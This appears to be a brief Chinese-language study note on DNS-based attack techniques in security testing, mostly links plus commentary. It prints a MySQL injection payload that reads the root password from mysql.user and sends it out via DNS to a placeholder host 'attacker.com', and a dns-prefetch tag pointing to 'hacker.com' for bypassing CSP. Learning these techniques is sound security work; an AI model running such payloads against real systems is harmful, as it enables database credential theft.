DNS学习: http://momomoxiaoxi.com/2016/12/02/DNSQUICDNSSSC/

先上工具 ceye.io
今天看到dalao的wp利用到了这个…感觉真棒
因为一直没有VPS, QAQ, 看dalao每天dns外带数据什么的…
但…要绑手机号…QAQ…wtf

一些常用的使用技巧 http://ceye.io/payloads

DNS利用一般用于盲注时候外带数据

什么情况下, 只能用DNS外带数据, 不能用HTTP请求外带

1. 命令执行时候不能用curl, 只能ping ???

DNS外带数据

mysql的payload

SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.attacker.com\\foobar'));

其实我不太理解, 这里的\\\\是为了干啥, select一下\\\\

mysql> select "\\\\";
+----+
| \\ |
+----+
| \\ |
+----+

其他的参考: http://ceye.io/payloads

有命令执行, sql注入, XXE, ….

再贴一篇[sql注入中用DNS获取数据]: http://wooyun.jozxing.cc/static/drops/tips-5283.html

又找到一篇: https://osandamalith.com/2017/02/03/mysql-out-of-band-hacking/
上一篇的翻译版: http://www.mottoin.com/96463.html

DNS 预加载绕过CSP

<link rel=”dns-prefetch” href=”hacker.com”>

贴篇文章: https://www.anquanke.com/post/id/84803

DNS rebinding 来 SSRF

这个…还是得…买个vps, 搞个域名

见33c3 list0r

DNS txt执行powershell

http://wooyun.jozxing.cc/static/drops/tips-8971.html